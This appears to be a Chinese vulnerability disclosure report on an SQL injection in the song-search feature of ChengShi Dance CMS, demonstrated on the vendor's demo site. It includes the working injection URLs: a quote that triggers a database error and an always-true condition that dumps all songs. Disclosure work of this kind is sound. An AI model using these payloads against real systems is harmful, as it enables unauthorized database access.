程氏舞曲CMS最新版某处SQL注射漏洞（官方演示站）

### 简要描述： 今天刚看到这个网站，于是就射了一吧！ ### 详细说明： 在歌曲搜索的地方，敲了一个单引号，于是就出现了如下的错误，其中单引号要转码为%27 http://demo.chshcms.com/index.php/dance/so/key/%27 [<img src="https://images.seebug.org/upload/201402/191704125d4a09102de9b72a0f41e0cfadb3eb51.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/191704125d4a09102de9b72a0f41e0cfadb3eb51.jpg) 然后构造了一下http://demo.chshcms.com/index.php/dance/so/key/wooyun' or '%'=' 转码后为http://demo.chshcms.com/index.php/dance/so/key/wooyun%27%20or%20%27%25%27%3D%27 [<img src="https://images.seebug.org/upload/201402/191709419abc7af2281dc6b95bb5d504944efb59.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/191709419abc7af2281dc6b95bb5d504944efb59.jpg) 所有的歌曲都查询出来了！ 然后就没有继续测试了。 ### 漏洞证明： http://demo.chshcms.com/index.php/dance/so/key/%27 [<img src="https://images.seebug.org/upload/201402/191704125d4a09102de9b72a0f41e0cfadb3eb51.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/191704125d4a09102de9b72a0f41e0cfadb3eb51.jpg) http://demo.chshcms.com/index.php/dance/so/key/wooyun%27%20or%20%27%25%27%3D%27 [<img src="https://images.seebug.org/upload/201402/191709419abc7af2281dc6b95bb5d504944efb59.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/191709419abc7af2281dc6b95bb5d504944efb59.jpg)